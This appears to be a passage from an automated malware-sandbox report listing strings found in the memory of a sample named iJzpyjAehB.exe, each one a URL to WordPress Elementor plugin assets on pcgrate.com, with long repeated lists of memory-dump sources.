00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/frontend.min.js?ver=3.3.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/preloaded-modules.min.js?ver=3.3.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/js/webpack.runtime.min.js?ver=3.3.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/animations/animations.min.css?ver=3.3
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/dialog/dialog.min.js?ver=4.8.1
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/css/elementor-icons.min.css?ve
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.eot?5.10.0);src:u
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.svg?5.10.0#eicon)
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5
                      Source: iJzpyjAehB.exe, 00000000.00000003.486573845.00000000037D0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.351870087.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.427667319.0000000005450000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292085282.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.291400658.0000000003580000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.434454926.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297414795.0000000003020000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296430221.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.373271861.0000000003330000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.432883313.00000000050A0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.428390043.0000000002530000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.400506653.00000000032E0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438584895.0000000003030000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.296772064.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.292541963.0000000003560000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.314410694.0000000003120000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.436653718.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.438316131.0000000002FE0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297118541.00000000035B0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.297246492.00000000035F0000.00000004.00001000.00020000.00000000.sdmp, iJzpyjAehB.exe, 00000000.00000003.286207911.00000000035B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?
